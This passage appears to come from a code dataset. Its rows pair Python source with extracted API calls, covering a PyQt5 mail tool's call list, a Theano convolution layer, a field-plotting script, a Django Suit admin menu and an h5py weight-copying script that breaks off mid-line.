{}), \"(self, 'Failed!', '信件寄出失敗!', QMessageBox.Ok)\\n\", (17635, 17679), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((18773, 18836), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '\"\"\"Failed!\"\"\"', '\"\"\"信件寄出失敗!\"\"\"', 'QMessageBox.Ok'], {}), \"(self, 'Failed!', '信件寄出失敗!', QMessageBox.Ok)\\n\", (18792, 18836), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((19762, 19798), 'mylibrary.genmail.gen_eml', 'gm.gen_eml', (['header', 'html', 'annex_file'], {}), '(header, html, annex_file)\\n', (19772, 19798), True, 'import mylibrary.genmail as gm\\n'), ((19838, 19862), 'mylibrary.genmail.gen_eml', 'gm.gen_eml', (['header', 'html'], {}), '(header, html)\\n', (19848, 19862), True, 'import mylibrary.genmail as gm\\n'), ((20036, 20064), 'email.generator.Generator', 'generator.Generator', (['outfile'], {}), '(outfile)\\n', (20055, 20064), False, 'from email import generator\\n'), ((20218, 20279), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '\"\"\"Failed!\"\"\"', '\"\"\"儲存失敗!\"\"\"', 'QMessageBox.Ok'], {}), \"(self, 'Failed!', '儲存失敗!', QMessageBox.Ok)\\n\", (20237, 20279), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((22015, 22088), 'PyQt5.QtWidgets.QFileDialog.getSaveFileName', 'QFileDialog.getSaveFileName', (['self', '\"\"\"另存為...\"\"\"', '\"\"\"./\"\"\"', '\"\"\"Excel Files (*.xlsx)\"\"\"'], {}), \"(self, '另存為...', './', 'Excel Files (*.xlsx)')\\n\", (22042, 22088), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((22172, 22202), 'pandas.DataFrame', 'DataFrame', (['self.data_temp_logs'], {}), '(self.data_temp_logs)\\n', (22181, 22202), False, 'from pandas import DataFrame\\n'), ((22272, 22338), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', (['self', '\"\"\"Success!\"\"\"', '\"\"\"儲存成功!\"\"\"', 'QMessageBox.Ok'], {}), \"(self, 'Success!', '儲存成功!', QMessageBox.Ok)\\n\", (22295, 22338), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((17150, 17156), 'server.sendmail.Smtp', 'Smtp', ([], {}), '()\\n', (17154, 17156), False, 'from server.sendmail import Smtp\\n'), ((17298, 17308), 'server.database.Database', 'Database', ([], {}), '()\\n', (17306, 17308), False, 'from server.database import Database\\n'), ((18503, 18589), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '\"\"\"Warning!\"\"\"', \"('信件寄出成功!\\\\nWaning: ' + error)\", 'QMessageBox.Ok'], {}), \"(self, 'Warning!', '信件寄出成功!\\\\nWaning: ' + error,\\n QMessageBox.Ok)\\n\", (18522, 18589), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((18626, 18694), 'PyQt5.QtWidgets.QMessageBox.information', 'QMessageBox.information', (['self', '\"\"\"Success!\"\"\"', '\"\"\"信件寄出成功!\"\"\"', 'QMessageBox.Ok'], {}), \"(self, 'Success!', '信件寄出成功!', QMessageBox.Ok)\\n\", (18649, 18694), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((20429, 20440), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\\n', (20438, 20440), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((22375, 22436), 'PyQt5.QtWidgets.QMessageBox.warning', 'QMessageBox.warning', (['self', '\"\"\"Failed!\"\"\"', '\"\"\"儲存失敗!\"\"\"', 'QMessageBox.Ok'], {}), \"(self, 'Failed!', '儲存失敗!', QMessageBox.Ok)\\n\", (22394, 22436), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((14893, 14904), 'PyQt5.QtWidgets.QLineEdit', 'QLineEdit', ([], {}), '()\\n', (14902, 14904), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((14992, 15003), 'PyQt5.QtWidgets.QCheckBox', 'QCheckBox', ([], {}), '()\\n', (15001, 15003), False, 'from PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QGridLayout, QMessageBox, QFileDialog, QLabel, QLineEdit, QPushButton, QComboBox, QCheckBox, QDateTimeEdit, QTextEdit, QTabWidget, QTableWidget, QTableWidgetItem, QHeaderView\\n'), ((21802, 21823), 'PyQt5.QtGui.QColor', 'QColor', (['(144)', '(182)', '(240)'], {}), '(144, 182, 240)\\n', (21808, 21823), False, 'from PyQt5.QtGui import QPalette, QColor, QBrush\\n'), ((14354, 14375), 'PyQt5.QtGui.QColor', 'QColor', (['(144)', '(182)', '(240)'], {}), '(144, 182, 240)\\n', (14360, 14375), False, 'from PyQt5.QtGui import QPalette, QColor, QBrush\\n')]"}}},{"rowIdx":736,"cells":{"code":{"kind":"string","value":"\"\"\"\nGpuCorrMM-based convolutional layers\n\"\"\"\n\nimport numpy as np\n\nimport theano\nimport theano.tensor as T\nfrom theano.sandbox.cuda.basic_ops import gpu_contiguous\nfrom theano.sandbox.cuda.blas import GpuCorrMM\n\nfrom .. import init\nfrom .. import nonlinearities\nfrom . import base\n\n\n# base class for all layers that rely on GpuCorrMM directly\nclass MMLayer(base.Layer):\n pass\n\n\nclass Conv2DMMLayer(MMLayer):\n def __init__(self, input_layer, num_filters, filter_size, strides=(1, 1), border_mode=None, untie_biases=False,\n W=init.Uniform(), b=init.Constant(0.), nonlinearity=nonlinearities.rectify, pad=None,\n flip_filters=False):\n super(Conv2DMMLayer, self).__init__(input_layer)\n if nonlinearity is None:\n self.nonlinearity = nonlinearities.identity\n else:\n self.nonlinearity = nonlinearity\n\n self.num_filters = num_filters\n self.filter_size = filter_size\n self.strides = strides\n self.untie_biases = untie_biases\n self.flip_filters = flip_filters\n\n if border_mode is not None and pad is not None:\n raise RuntimeError(\"You cannot specify both 'border_mode' and 'pad'. To avoid ambiguity, please specify only one of them.\")\n elif border_mode is None and pad is None:\n # no option specified, default to valid mode\n self.pad = (0, 0)\n elif border_mode is not None:\n if border_mode == 'valid':\n self.pad = (0, 0)\n elif border_mode == 'full':\n self.pad = (self.filter_size[0] - 1, self.filter_size[1] -1)\n elif border_mode == 'same':\n # only works for odd filter size, but the even filter size case is probably not worth supporting.\n self.pad = ((self.filter_size[0] - 1) // 2, (self.filter_size[1] - 1) // 2)\n else:\n raise RuntimeError(\"Unsupported border_mode for Conv2DMMLayer: %s\" % border_mode)\n else:\n self.pad = pad\n\n self.W = self.create_param(W, self.get_W_shape())\n if b is None:\n self.b = None\n elif self.untie_biases:\n output_shape = self.get_output_shape()\n self.b = self.create_param(b, (num_filters, output_shape[2], output_shape[3]))\n else:\n self.b = self.create_param(b, (num_filters,))\n\n self.corr_mm_op = GpuCorrMM(subsample=self.strides, pad=self.pad)\n\n def get_W_shape(self):\n num_input_channels = self.input_layer.get_output_shape()[1]\n return (self.num_filters, num_input_channels, self.filter_size[0], self.filter_size[1])\n\n def get_params(self):\n return [self.W] + self.get_bias_params()\n\n def get_bias_params(self):\n return [self.b] if self.b is not None else []\n\n def get_output_shape_for(self, input_shape):\n batch_size = input_shape[0]\n input_width, input_height = input_shape[2:4]\n output_width = (input_width + 2*self.pad[0] - self.filter_size[0]) // self.strides[0] + 1\n output_height = (input_height + 2*self.pad[1] - self.filter_size[1]) // self.strides[1] + 1\n return (batch_size, self.num_filters, output_width, output_height)\n\n def get_output_for(self, input, *args, **kwargs):\n filters = self.W\n if self.flip_filters:\n filters = filters[:, :, ::-1, ::-1] # flip width, height\n \n contiguous_filters = gpu_contiguous(filters)\n contiguous_input = gpu_contiguous(input)\n conved = self.corr_mm_op(contiguous_input, contiguous_filters)\n\n if self.b is None:\n activation = conved\n elif self.untie_biases:\n activation = conved + self.b.dimshuffle('x', 0, 1, 2)\n else:\n activation = conved + self.b.dimshuffle('x', 0, 'x', 'x')\n\n return self.nonlinearity(activation)\n\n"},"apis":{"kind":"list like","value":["theano.sandbox.cuda.basic_ops.gpu_contiguous","theano.sandbox.cuda.blas.GpuCorrMM"],"string":"[\n \"theano.sandbox.cuda.basic_ops.gpu_contiguous\",\n \"theano.sandbox.cuda.blas.GpuCorrMM\"\n]"},"extract_api":{"kind":"string","value":"[((2405, 2452), 'theano.sandbox.cuda.blas.GpuCorrMM', 'GpuCorrMM', ([], {'subsample': 'self.strides', 'pad': 'self.pad'}), '(subsample=self.strides, pad=self.pad)\\n', (2414, 2452), False, 'from theano.sandbox.cuda.blas import GpuCorrMM\\n'), ((3436, 3459), 'theano.sandbox.cuda.basic_ops.gpu_contiguous', 'gpu_contiguous', (['filters'], {}), '(filters)\\n', (3450, 3459), False, 'from theano.sandbox.cuda.basic_ops import gpu_contiguous\\n'), ((3487, 3508), 'theano.sandbox.cuda.basic_ops.gpu_contiguous', 'gpu_contiguous', (['input'], {}), '(input)\\n', (3501, 3508), False, 'from theano.sandbox.cuda.basic_ops import gpu_contiguous\\n')]"}}},{"rowIdx":737,"cells":{"code":{"kind":"string","value":"import numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nimport sys\nsys.path.append(\"../\")\nfrom quelea import *\n\nnx = 217\nny = 133\n\nx0 = 0\nx1 = 30 # lambdas\ny0 = 0\ny1 = 20 # lambdas\n\nxs = np.linspace(x0, x1, nx)\nys = np.linspace(y0, y1, ny)\n\n# 2d array of (x, y, z, t)\ncoords = np.array( [ [x, y, 0, 0] for x in xs for y in ys ] )\n# for map_fields function this should be converted from 2D to 1D array\ncoords = coords.reshape((4 * nx * ny,))\n\nftype = 1 # plane wave\na0 = 1 # normalized field amplitude\nomega = 1 # frequency\nfparam = [a0, 1, 0, 0, 0, 1, 0, 0, omega] # parameters of the plane wave\n\nex, ey, ez, bx, by, bz = map_fields(coords, ftype, fparam)\n# now convert to 2d arrays\nex = ex.reshape((nx, ny))\ney = ey.reshape((nx, ny))\nez = ez.reshape((nx, ny))\nbx = bx.reshape((nx, ny))\nby = by.reshape((nx, ny))\nbz = bz.reshape((nx, ny))\nex = ex.transpose()\ney = ey.transpose()\nez = ez.transpose()\nbx = bx.transpose()\nby = by.transpose()\nbz = bz.transpose()\n\nplt.imshow(ey, cmap = 'RdYlBu', origin = 'lower', extent = [x0, x1, y0, y1])\nplt.colorbar()\nplt.clim(-a0, a0)\n\nplt.savefig(\"map_fields.pdf\")\n\n"},"apis":{"kind":"list like","value":["matplotlib.pyplot.imshow","matplotlib.pyplot.clim","matplotlib.pyplot.savefig","matplotlib.pyplot.colorbar","numpy.array","numpy.linspace","sys.path.append"],"string":"[\n \"matplotlib.pyplot.imshow\",\n \"matplotlib.pyplot.clim\",\n \"matplotlib.pyplot.savefig\",\n \"matplotlib.pyplot.colorbar\",\n \"numpy.array\",\n \"numpy.linspace\",\n \"sys.path.append\"\n]"},"extract_api":{"kind":"string","value":"[((81, 103), 'sys.path.append', 'sys.path.append', (['\"\"\"../\"\"\"'], {}), \"('../')\\n\", (96, 103), False, 'import sys\\n'), ((201, 224), 'numpy.linspace', 'np.linspace', (['x0', 'x1', 'nx'], {}), '(x0, x1, nx)\\n', (212, 224), True, 'import numpy as np\\n'), ((230, 253), 'numpy.linspace', 'np.linspace', (['y0', 'y1', 'ny'], {}), '(y0, y1, ny)\\n', (241, 253), True, 'import numpy as np\\n'), ((291, 339), 'numpy.array', 'np.array', (['[[x, y, 0, 0] for x in xs for y in ys]'], {}), '([[x, y, 0, 0] for x in xs for y in ys])\\n', (299, 339), True, 'import numpy as np\\n'), ((974, 1044), 'matplotlib.pyplot.imshow', 'plt.imshow', (['ey'], {'cmap': '\"\"\"RdYlBu\"\"\"', 'origin': '\"\"\"lower\"\"\"', 'extent': '[x0, x1, y0, y1]'}), \"(ey, cmap='RdYlBu', origin='lower', extent=[x0, x1, y0, y1])\\n\", (984, 1044), True, 'import matplotlib.pyplot as plt\\n'), ((1051, 1065), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ([], {}), '()\\n', (1063, 1065), True, 'import matplotlib.pyplot as plt\\n'), ((1066, 1083), 'matplotlib.pyplot.clim', 'plt.clim', (['(-a0)', 'a0'], {}), '(-a0, a0)\\n', (1074, 1083), True, 'import matplotlib.pyplot as plt\\n'), ((1085, 1114), 'matplotlib.pyplot.savefig', 'plt.savefig', (['\"\"\"map_fields.pdf\"\"\"'], {}), \"('map_fields.pdf')\\n\", (1096, 1114), True, 'import matplotlib.pyplot as plt\\n')]"}}},{"rowIdx":738,"cells":{"code":{"kind":"string","value":"from django.conf import settings\n\nfrom suit import apps\nfrom suit.apps import DjangoSuitConfig\nfrom suit.menu import ParentItem, ChildItem\n\nAPP_NAME = settings.APP_NAME\nWIKI_URL = settings.WIKI_URL\n\nclass SuitConfig(DjangoSuitConfig):\n name = 'suit'\n verbose_name = 'Mbiome Core JAXid Generator'\n site_title = 'Mbiome Core JAXid Tracking'\n site_header = site_title\n index_title = verbose_name\n\n layout = 'vertical'\n list_per_page = 35\n\n # header_date_format = 'l, d-M-o'\n # header_time_format = 'H:i e'\n\n menu = (\n ParentItem('JAX Id Record Lists',\n use_first_child_url=True,\n url='',\n children=[\n ChildItem('JAXid Records', model='id_generate.jaxiddetail'),\n ChildItem(model='id_generate.boxid'),\n ChildItem(model='id_generate.plateid'),\n ],\n icon='fa fa-list-ul'),\n ParentItem('Reference Data',\n use_first_child_url=True,\n url='',\n children=[\n ChildItem(model='id_generate.projectcode'),\n ChildItem(model='id_generate.nucleicacidtype'),\n ChildItem(model='id_generate.sampletype'),\n ChildItem(model='id_generate.sequencingtype'),\n ],\n icon='fa fa-list'),\n ParentItem(\n label='Generate new JAXid''s',\n url=f'/{APP_NAME}/manage/id_generate/jaxiddetail/import/',\n permissions='id_generate.change_jaxiddetail',\n icon='fa fa-rocket'),\n ParentItem(\n label='Generate new Box ID''s',\n url=f'/{APP_NAME}/manage/id_generate/boxid/import/',\n permissions='id_generate.change_boxid',\n icon='fa fa-cube'),\n ParentItem(\n label='Generate new Plate ID''s',\n url=f'/{APP_NAME}/manage/id_generate/plateid/import/',\n permissions='id_generate.change_plateid',\n icon='fa fa-circle-o-notch'),\n ParentItem(\n label='Authorization',\n children=[\n ChildItem('Staff', model='auth.user'),\n ChildItem(model='auth.group'),\n ChildItem(model='admin.logentry'),\n ],\n icon='fa fa-user-circle'),\n\n ParentItem(\n label='SOP and Request Sheet',\n use_first_child_url=False,\n url='',\n children=[\n ChildItem('View JAX ID Request SOP',\n target_blank=True,\n url=f'{WIKI_URL}/Wet%20Lab%20SOPs/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FWet%20Lab%20SOPs%2FJAX%20ID%20Request%20SOP%2Edocx'),\n ChildItem('View JAX ID Request Template Sheet',\n url=f'{WIKI_URL}/Sample Sheet Templates/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FSample Sheet Templates%2FJAX ID Request Template Sample Sheet.xlsx'),\n ],\n icon='fa fa-file'),\n )\n # menu_handler = None\n menu_show_home = False\n\n\n # Show changelist top actions only if any row is selected\n toggle_changelist_top_actions = False\n\n\n# # Enables two column layout for change forms with submit row on the right\n form_submit_on_right = False\n\n # Hide name/\"original\" column for all tabular inlines.\n # May be overridden in Inline class by suit_form_inlines_hide_original = False\n #form_inlines_hide_original = False\n\n form_size = {\n 'default': apps.SUIT_FORM_SIZE_LARGE,\n 'widgets': {\n 'AutosizedTextarea': apps.SUIT_FORM_SIZE_X_LARGE,\n 'Textarea': apps.SUIT_FORM_SIZE_X_LARGE,\n },\n }\n\n # form_size setting can be overridden in ModelAdmin using suit_form_size parameter\n #\n # Example:\n # ----------------------------------------------\n # suit_form_size = {\n # 'default': 'col-xs-12 col-sm-2', 'col-xs-12 col-sm-10',\n # 'fields': {\n # 'field_name': SUIT_FORM_SIZE_LARGE,\n # 'field_name2': SUIT_FORM_SIZE_X_LARGE,\n # },\n # 'widgets': {\n # 'widget_class_name': SUIT_FORM_SIZE_FULL,\n # 'AdminTextareaWidget': SUIT_FORM_SIZE_FULL,\n # },\n # 'fieldsets': {\n # 'fieldset_name': SUIT_FORM_SIZE_FULL,\n # 'fieldset_name2': SUIT_FORM_SIZE_FULL,\n # }\n # }\n"},"apis":{"kind":"list like","value":["suit.menu.ChildItem","suit.menu.ParentItem"],"string":"[\n \"suit.menu.ChildItem\",\n \"suit.menu.ParentItem\"\n]"},"extract_api":{"kind":"string","value":"[((1411, 1586), 'suit.menu.ParentItem', 'ParentItem', ([], {'label': '\"\"\"Generate new JAXids\"\"\"', 'url': 'f\"\"\"/{APP_NAME}/manage/id_generate/jaxiddetail/import/\"\"\"', 'permissions': '\"\"\"id_generate.change_jaxiddetail\"\"\"', 'icon': '\"\"\"fa fa-rocket\"\"\"'}), \"(label='Generate new JAXids', url=\\n f'/{APP_NAME}/manage/id_generate/jaxiddetail/import/', permissions=\\n 'id_generate.change_jaxiddetail', icon='fa fa-rocket')\\n\", (1421, 1586), False, 'from suit.menu import ParentItem, ChildItem\\n'), ((1657, 1819), 'suit.menu.ParentItem', 'ParentItem', ([], {'label': '\"\"\"Generate new Box IDs\"\"\"', 'url': 'f\"\"\"/{APP_NAME}/manage/id_generate/boxid/import/\"\"\"', 'permissions': '\"\"\"id_generate.change_boxid\"\"\"', 'icon': '\"\"\"fa fa-cube\"\"\"'}), \"(label='Generate new Box IDs', url=\\n f'/{APP_NAME}/manage/id_generate/boxid/import/', permissions=\\n 'id_generate.change_boxid', icon='fa fa-cube')\\n\", (1667, 1819), False, 'from suit.menu import ParentItem, ChildItem\\n'), ((1890, 2068), 'suit.menu.ParentItem', 'ParentItem', ([], {'label': '\"\"\"Generate new Plate IDs\"\"\"', 'url': 'f\"\"\"/{APP_NAME}/manage/id_generate/plateid/import/\"\"\"', 'permissions': '\"\"\"id_generate.change_plateid\"\"\"', 'icon': '\"\"\"fa fa-circle-o-notch\"\"\"'}), \"(label='Generate new Plate IDs', url=\\n f'/{APP_NAME}/manage/id_generate/plateid/import/', permissions=\\n 'id_generate.change_plateid', icon='fa fa-circle-o-notch')\\n\", (1900, 2068), False, 'from suit.menu import ParentItem, ChildItem\\n'), ((703, 762), 'suit.menu.ChildItem', 'ChildItem', (['\"\"\"JAXid Records\"\"\"'], {'model': '\"\"\"id_generate.jaxiddetail\"\"\"'}), \"('JAXid Records', model='id_generate.jaxiddetail')\\n\", (712, 762), False, 'from suit.menu import ParentItem, ChildItem\\n'), ((784, 820), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '\"\"\"id_generate.boxid\"\"\"'}), \"(model='id_generate.boxid')\\n\", (793, 820), False, 'from suit.menu import ParentItem, ChildItem\\n'), ((842, 880), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '\"\"\"id_generate.plateid\"\"\"'}), \"(model='id_generate.plateid')\\n\", (851, 880), False, 'from suit.menu import ParentItem, ChildItem\\n'), ((1098, 1140), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '\"\"\"id_generate.projectcode\"\"\"'}), \"(model='id_generate.projectcode')\\n\", (1107, 1140), False, 'from suit.menu import ParentItem, ChildItem\\n'), ((1162, 1208), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '\"\"\"id_generate.nucleicacidtype\"\"\"'}), \"(model='id_generate.nucleicacidtype')\\n\", (1171, 1208), False, 'from suit.menu import ParentItem, ChildItem\\n'), ((1230, 1271), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '\"\"\"id_generate.sampletype\"\"\"'}), \"(model='id_generate.sampletype')\\n\", (1239, 1271), False, 'from suit.menu import ParentItem, ChildItem\\n'), ((1293, 1338), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '\"\"\"id_generate.sequencingtype\"\"\"'}), \"(model='id_generate.sequencingtype')\\n\", (1302, 1338), False, 'from suit.menu import ParentItem, ChildItem\\n'), ((2237, 2274), 'suit.menu.ChildItem', 'ChildItem', (['\"\"\"Staff\"\"\"'], {'model': '\"\"\"auth.user\"\"\"'}), \"('Staff', model='auth.user')\\n\", (2246, 2274), False, 'from suit.menu import ParentItem, ChildItem\\n'), ((2296, 2325), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '\"\"\"auth.group\"\"\"'}), \"(model='auth.group')\\n\", (2305, 2325), False, 'from suit.menu import ParentItem, ChildItem\\n'), ((2347, 2380), 'suit.menu.ChildItem', 'ChildItem', ([], {'model': '\"\"\"admin.logentry\"\"\"'}), \"(model='admin.logentry')\\n\", (2356, 2380), False, 'from suit.menu import ParentItem, ChildItem\\n'), ((2634, 2845), 'suit.menu.ChildItem', 'ChildItem', (['\"\"\"View JAX ID Request SOP\"\"\"'], {'target_blank': '(True)', 'url': 'f\"\"\"{WIKI_URL}/Wet%20Lab%20SOPs/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FWet%20Lab%20SOPs%2FJAX%20ID%20Request%20SOP%2Edocx\"\"\"'}), \"('View JAX ID Request SOP', target_blank=True, url=\\n f'{WIKI_URL}/Wet%20Lab%20SOPs/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FWet%20Lab%20SOPs%2FJAX%20ID%20Request%20SOP%2Edocx'\\n )\\n\", (2643, 2845), False, 'from suit.menu import ParentItem, ChildItem\\n'), ((2917, 3142), 'suit.menu.ChildItem', 'ChildItem', (['\"\"\"View JAX ID Request Template Sheet\"\"\"'], {'url': 'f\"\"\"{WIKI_URL}/Sample Sheet Templates/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FSample Sheet Templates%2FJAX ID Request Template Sample Sheet.xlsx\"\"\"'}), \"('View JAX ID Request Template Sheet', url=\\n f'{WIKI_URL}/Sample Sheet Templates/Forms/All.aspx?parent=1&id=%2Fsites%2FMicrobiomeCoreWiki%2FSample Sheet Templates%2FJAX ID Request Template Sample Sheet.xlsx'\\n )\\n\", (2926, 3142), False, 'from suit.menu import ParentItem, ChildItem\\n')]"}}},{"rowIdx":739,"cells":{"code":{"kind":"string","value":"import h5py\nimport numpy as np\nnp.set_printoptions(threshold=np.nan)\n\nfrom shutil import copyfile\n\ncopyfile(\"dummy_lutnet.h5\", \"pretrained_bin.h5\") # create pretrained.h5 using datastructure from dummy.h5\n\nbl = h5py.File(\"baseline_pruned.h5\", 'r')\n#dummy = h5py.File(\"dummy.h5\", 'r')\npretrained = h5py.File(\"pretrained_bin.h5\", 'r+')\n\n# dense layer 1\n\nbl_w1 = bl[\"model_weights\"][\"binary_dense_1\"][\"binary_dense_1\"][\"Variable_1:0\"]\nbl_pruning_mask = bl[\"model_weights\"][\"binary_dense_1\"][\"binary_dense_1\"][\"pruning_mask:0\"]\nbl_gamma = bl[\"model_weights\"][\"binary_dense_1\"][\"binary_dense_1\"][\"Variable:0\"]\nzero_fill = np.zeros(np.shape(np.array(bl_w1)))\npret_w1 = pretrained[\"model_weights\"][\"binary_dense_1\"][\"binary_dense_1\"][\"Variable_1:0\"]\npret_pruning_mask = pretrained[\"model_weights\"][\"binary_dense_1\"][\"binary_dense_1\"][\"pruning_mask:0\"]\np_gamma = pretrained[\"model_weights\"][\"binary_dense_1\"][\"binary_dense_1\"][\"Variable:0\"]\n\npret_w1[...] = np.array(bl_w1)\np_gamma[...] = np.array(bl_gamma)\npret_pruning_mask[...] = np.array(bl_pruning_mask)\n\nprint(np.sum(np.array(bl_pruning_mask)), np.prod(np.shape(np.array(bl_pruning_mask))))\n\n# dense layer 2\n\nbl_w1 = bl[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_1:0\"]\nbl_rand_map_0 = bl[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"rand_map_0:0\"]\nbl_pruning_mask = bl[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"pruning_mask:0\"]\nbl_gamma = bl[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable:0\"]\nbl_means = bl[\"model_weights\"][\"residual_sign_1\"][\"residual_sign_1\"][\"means:0\"]\npret_rand_map_0 = pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"rand_map_0:0\"]\npret_rand_map_1 = pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"rand_map_1:0\"]\npret_rand_map_2 = pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"rand_map_2:0\"]\npret_pruning_mask = pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"pruning_mask:0\"]\np_gamma = pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable:0\"]\npret_means = pretrained[\"model_weights\"][\"residual_sign_1\"][\"residual_sign_1\"][\"means:0\"]\n\npret_c1 = pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_1:0\"]\npret_c2 = pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_2:0\"]\npret_c3 = pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_3:0\"]\npret_c4 = pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_4:0\"]\npret_c5 = pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_5:0\"]\npret_c6 = pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_6:0\"]\npret_c7 = pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_7:0\"]\npret_c8 = pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_8:0\"]\npret_c9 = pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_9:0\"]\npret_c10= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_10:0\"]\npret_c11= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_11:0\"]\npret_c12= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_12:0\"]\npret_c13= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_13:0\"]\npret_c14= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_14:0\"]\npret_c15= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_15:0\"]\npret_c16= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_16:0\"]\npret_c17= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_17:0\"]\npret_c18= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_18:0\"]\npret_c19= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_19:0\"]\npret_c20= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_20:0\"]\npret_c21= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_21:0\"]\npret_c22= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_22:0\"]\npret_c23= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_23:0\"]\npret_c24= 